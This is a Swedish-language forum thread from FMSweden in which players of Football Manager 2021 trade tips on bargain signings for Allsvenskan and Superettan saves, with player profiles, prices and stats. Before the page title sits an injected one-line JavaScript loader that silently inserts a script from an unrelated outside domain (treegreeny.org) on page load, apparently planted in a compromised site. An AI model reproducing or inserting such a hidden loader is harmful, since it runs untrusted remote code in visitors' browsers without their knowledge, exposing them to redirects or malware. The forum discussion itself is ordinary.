;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Spelartips Allsvenskan – Football Manager 2021 – FMSweden Forum
Meny Stäng

Spelartips Allsvens...

Share:
Notifications
Clear all

Spelartips Allsvenskan

14 Inlägg
8 Users
14 Reactions
5,451 Visningar
Niklas7
(@niklas7)
Trusted Member
Topic starter  

Tänkte först att det kunde vara trevligt med en tråd om spelartips rent generellt men i efterhand kanske den tanken var alldeles för stor så istället valde jag att bara göra en tråd gällande den liga jag just för stunden spelar i. Har precis spelat klart min fjärde säsong med Sirius där vi tillslut har fått ta hem bucklan i en oerhört jämn spelare där vi vinner med en god marginal gällande målskillnad. Men åter till speltips, under dessa fyra säsonger så har en del fynd gjort och i denna tråd tänker jag att man ska dela med sig av sina tips och fynd!

Lyngbo anslöt under första säsongen och har under tidens gång petat Karl Larsson vilket gjorde att den sistnämde valde att lämna. En offensiv ytterback som erbjuder mycket framåt och är stabil bakåt. På 89 allsvenska matcher har han gjort 4 mål och 11 assist. Plockades gratis under första säsongen. Helt klart en spelare värt att checka upp!

Mathias Kvistgaarden är en dansk anfallare som går att finna i Bröndby. Som ni kan se på screenet så har han verkligen exploderat målmässigt och sett totalt har han varit en bra pusselbit i laget sedan han plockades in. Bröndby åkte överraskande ut ur Danska högstaligan och jag var då inte se att försöka fynda där. En av det tre jag snodde åt mig var just Kvistgaarden för en så simpel summa som 200t kr. 36 mål, 8 assist på tre säsonger, att säga att han inte är värd alla pengar är för mig en gåta.

Har bara varit i klubben i två säsonger nu men är redan lagets lagkapten och bärande spelare i backlinjen. 2022 så valde Midtjylland att transferlista honom för en så lång summa som 315t kr och vi tvekade inte alls, de var bara att hugga. Bildar ett fruktat mittlås tillsammans med en annan dansk som kommer lite längre ner.

Spelar i PSG som ni kanske ser, men innan det hann han faktiskt mellanlanda i Uppsala och Sirius. Dök upp bland scoutrapporterna, då spelade han i en akademiklubb och gick att lösa helt gratis. En säsong senare var han såld då det var totalt omöjligt att hålla honom kvar. Hade kunnat få över 100 milj från Kinesiska klubbar men styrelsen tackade ja istället på ett bud på 28 milj från PSG. 4+9 mål/assist på 25 allsvenska matcher, men fler poäng gjordes i cupmatcher.

Mannsverk har vi fyndat när han var klubblös efter att han lämnat Sogndal. Där var han riktigt bra och när han väl anslöt oss så var han ingen höjdare, dock började han under andra delen av nuvarande säsong att prestera och helt plötsligt står han nu på 10 assister från sin MC-roll, kan komma att bli överraskande viktigt framöver.

Kabongo är Riis kollega på mittbacken och vilken gigant denna spelare har varit. Han var med Bröndby och åkte ur, men tog även upp dom i högstaligan igen, men under återkomsten i högstaligan så fick han inte förtroende och valde att lämna efter säsongen då kontraktet gick ut. Vi såg vår chans att ersätta Jarl och tog in Kabongo. Nästan 2 meter lång och stark som en oxe, ingen jävel att bråka med dvs. Borde kunnas ge en chans i de danska landslaget ifall ni frågar mig.

Sista tipset i detta inlägg blir en ytterligare dansk, även denna plockad på free transfer. Om ni såg Sverige mot Danmark nyligen så fick ni ju se ett mål från denna spelare då han hoppade in i matchen och gjorde matchens sista mål. På saven har han varit en helt okej spelare för SönderjyskE fram till kontraktet gick ut. Har bara spelat en halv säsong hos oss men har redan gjort sig hemma. 8 mål på 14 allsvenska matcher viftar man inte bort. Används på hela högerkanten, ytterback som ytter. Gör absolut inte bort sig än så länge.

Bidra gärna ni också med spelare som man kan fynda till Allsvenskan, bjussa gärna på screen så man kan få en inblick på spelaren.

raca14, zXc, FMonside and 1 people reacted
Citera
Daniel Nilsson
(@daniel-nilsson)
Noble Member Admin

Jättebra initiativ!

SvaraCitera
zXc
 zXc
(@zxc)
Estimable Member

Någon som har spelartips för en klubb i Superettan (ÖIS) första säsongen? 

SvaraCitera
Daniel Nilsson
(@daniel-nilsson)
Noble Member Admin

Postad av: @zxc

Någon som har spelartips för en klubb i Superettan (ÖIS) första säsongen? 

Nu har jag planer på att skriva om en hel del spelartips om lördagar riktat mot just Allsvenskan.. Men kan namnge Noah Shamoun som jag tipsat om till en del andra!

zXc reacted
SvaraCitera
Daniel Nilsson
(@daniel-nilsson)
Noble Member Admin

Namn: Noah Shamoun

Födelsedatum: 2002-12-08 (17 år)
Nation: Sverige
Klubb: Assyriska Turabdin IK
Position: CM (OMC)
Personlighet: Balanserad
Höjd: 170 cm
Vikt: 57 kg
Bästa fot: Höger

Kontraktsslut: 2022-12-31 (Ungdomskontrakt)
Lön: 50 kr/v
Värde: 230 000 kr

Tips på bud: 180 000 kr

Spelarfärdigheter: –

Bästa attribut: Bollmottagning (13), Teknik (13), Beslutsamhet (13), Finess (13), Acceleration (13) & Smidighet (13).

Kommentar: En blivande playmaker som redan nu besitter otroliga spetsegenskaper i form av bollbehandling. Noah är vid spelets start 17 år, spelar i Assyriskas juniorlag och har ett ungdomskontrakt vilket gör det ännu lättare att knyta an honom till din klubb för en billig summa, om du nu inte väljer att direkt erbjuda honom ett kontrakt. Med en balanserad personlighet finns det utrymme att forma honom via mentorskap. Noah har dessutom en väldigt hög potential och kan mycket väl utvecklas till en stjärna i Allsvenskan.

Zekaa reacted
SvaraCitera
friggan
(@friggan)
Estimable Member

SvaraCitera
zXc
 zXc
(@zxc)
Estimable Member

Hittade en talangfull anfallare vid namn Elias Cederblad i Friska Viljor i Div 2. Killen är född 2003. Kan värva honom för ca 5K. Kap!

SvaraCitera
Zekaa
(@zekaa)
New Member

Antonio Yakoub, anfallare, från Assyriska är en fin spelare som jag rekommenderar varmt! Killen är 17 år och har fina offensiva stats trots sin ringa ålder. https://imgur.com/a/q615Qdx

This post was modified 4 år sedan 2 times by Zekaa

SvaraCitera
zXc
 zXc
(@zxc)
Estimable Member

@zekaa

Ska kolla upp honom när jag ska lira senare idag ? 

SvaraCitera
(@ericaallflood)
Active Member

Den gode Awudu började som ett nödlösning till att förstärka mitt anfall och värvades in för 450 000:-.

När jag väl fick in en annan anfallare (Selmani) till mitt Djurgården, förpassades Awudu till reservlagstruppen.

Det var igår när jag gick in och såg att han hade gjort 4 mål vid en 4-0-vinst i Reservlagsligan som jag fick upp ögonen.

Awudu har då alltså gjort 22 mål på 6 (11) matcher.

Detta gjorde att jag plockade upp honom till A-laget för den stundande SvCupen-matchen mot div2-laget IFK Åmål, där Awudu gjorde sina 2 första A-lagsmål som Djurgårdare.

Veckan efter var det dags för ECL-match mot Genk (0-0,3-1) och Awudu kom med i truppen.

Möte 2 mellan DIF-GENK satte han spiken i kistan med sitt 3-1-mål.

Hans första allsvenska match blev inte som vi hoppades på, Awudu hoppade in med 35 min kvar när Hammarby ledde med 4-0. Matchen slutade 5-2, Awudu gjorde båda.

Så att såhär långt har jag kommit hittills med denna guldklimp som köptes från Segunda-laget CF Fuenlabrada för knappa halvmiljonen.

Sitter tyvärr på jobbet så jag kan inte printa hans stats.

Men han är en offensivt spelande forward, med fin (16) acc och fart.

Ligger på 14 i avslut.

https://www.transfermarkt.com/tahiru-awudu/profil/spieler/579649

Nillie reacted
SvaraCitera
@d@m
 @d@m
(@dm)
Eminent Member

Spelar med Brage och kämpar för att hålla mig kvar i Allsvenskan (2a säsongen). Jag har, för övrigt, aldrig varit med om en jämnare serie i hela min FM-karriär. Men i alla fall:

- Önskar gärna tips på yttrar och/eller ytterbackar som inte kostar mer än typ 500k då ekonomin är katastrof

SvaraCitera
Daniel Nilsson
(@daniel-nilsson)
Noble Member Admin

Postad av: @dm

Spelar med Brage och kämpar för att hålla mig kvar i Allsvenskan (2a säsongen). Jag har, för övrigt, aldrig varit med om en jämnare serie i hela min FM-karriär. Men i alla fall:

- Önskar gärna tips på yttrar och/eller ytterbackar som inte kostar mer än typ 500k då ekonomin är katastrof

Där finns inte spelare att låna in?

Att värva för att hålla sig kvar är ju inte direkt inom den ekonomiska ramen känner jag annat än spelare från typ Division 1...

SvaraCitera
@d@m
 @d@m
(@dm)
Eminent Member

Postad av: @daniel-nilsson
Postad av: @dm

Där finns inte spelare att låna in?

Att värva för att hålla sig kvar är ju inte direkt inom den ekonomiska ramen känner jag annat än spelare från typ Division 1...

Inga av kvalitet som vill gå till Brage som kämpar i botten. Bytte dock taktik och ligger på en stabil mittenplats. Värvade ngn halvtaskig talang som ytterback och ordinarie OHM/OVM dög på ytterpositionerna.

Tack iaf!

SvaraCitera
(@vhems)
New Member

Min första save på FM21 och är nu långt gången på min andra säsong med IFK Norrköping och har vunnit Svenska Cupen båda åren, kvalat in till EL och åkt i åttondelen första året, förlorade AS i sista matchen efter förlust mot Hammarby som vann första säsongen men leder nu AS stort efter 20 omgångar andra säsongen. Det jag främst spelar FM för är för att hitta och utveckla talanger, men även hitta bra "färdiga" spelare som passar bra in. Här kommer ett stort spelartips:

Sverige:
Lucas Forsberg, HB/VB, Sollentuna (Nyligen klar för AIK irl) - Ett måsteköp för vilket Allsvenskt lag som helst.
Andre Picornell, MV, BP - Använt som andramålvakt men kommer ta över som förstamålvakt kommande tredjesäsong.
Axel Wallenborg, VB, DIF - Kostar lite mer men blir nog Sveriges bästa ytterback längre fram i spelet.
Johan Bengtsson, Ytter, Sundsvall - Inte lyckats få ännu men ligger högt på önskelistan.
Williot Swedberg, MC, HIF - Utlånad första två säsongerna men ligger högt på önskelistan efter det.
Hussein Ali, HB, Örebro - Nu valde jag Forsberg istället pga priset men Ali blir bättre.
Alexander Milosevic - Gratis i början.
Astrit Ajdarevic - Gratis i början.

Afrikanska måsteköp:
Asanele Velebhayi, OM, Cape Town - Kostar knappt någonting (går att få gratis en halv säsong in) och utvecklas till en riktig klasspelare, egentligen alldeles för bra för AS.
Liam Bern, MB, Cape Town - Samma resonemang som med Velebhayi.
Ghabadino Mhango, Anf - Värvades för 1.25mkr nu värderad till över 10mkr. Har fått varit back-up till Nyman och haft målgaranti varje start.

Övriga måsteköp:
***** Jasurbek Jalollidinov, MF/HY, GRATIS - Utvecklas till en världsklasspelare några säsonger in.
Steve Mvoué, MF - Kostar lite mer men utvecklas till en världsklasspelare.
Max Normann Williamsen, MB - Kostar lite mer men utvecklas till en världsklasspelare.

Samtliga spelare går till ett Allsvenskt lag med ok löneanspråk (Norrköping i detta fall) och gör ditt lag slagkraftigt ute i Europa efter ett par säsonger alternativt ger dig en riktigt fet kassa om du säljer vidare. Problemet börjar nu istället bli att mina EPK-klassade spelare får för bra bud på sig för att nej till så jag behöver utveckla nya EPK's från ungdomslaget. Tips på hur man lyckas utveckla de bästa regensen från ungdomslaget mottages tacksamt, förbättrat rekrytering och ungdomsanläggning så hoppas på resultat där.

SvaraCitera
Share: